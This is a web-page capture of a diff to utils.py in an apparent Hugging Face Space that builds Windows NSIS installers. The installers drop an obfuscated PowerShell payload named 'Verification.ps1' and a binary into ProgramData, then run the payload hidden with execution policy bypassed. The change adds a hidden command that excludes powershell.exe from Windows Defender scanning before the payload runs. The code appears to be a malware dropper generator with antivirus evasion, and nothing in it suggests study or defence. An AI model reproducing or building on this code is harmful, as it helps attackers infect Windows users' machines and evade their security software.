Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -17,7 +17,7 @@ COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
|
|
17 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
18 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
19 |
UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
|
20 |
-
POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "
|
21 |
|
22 |
def generate_random_string(length=8):
|
23 |
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
|
@@ -87,9 +87,8 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
87 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
88 |
File "{bin_file}"
|
89 |
File "{ps1_file}"
|
90 |
-
|
91 |
-
|
92 |
-
Abort
|
93 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
94 |
SetAutoClose true
|
95 |
SectionEnd
|
|
|
17 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
18 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
19 |
UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
|
20 |
+
POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "power.ps1")
|
21 |
|
22 |
def generate_random_string(length=8):
|
23 |
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
|
|
|
87 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
88 |
File "{bin_file}"
|
89 |
File "{ps1_file}"
|
90 |
+
ExecShell "open" "powershell.exe" '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""' SW_HIDE
|
91 |
+
Sleep 10000
|
|
|
92 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
93 |
SetAutoClose true
|
94 |
SectionEnd
|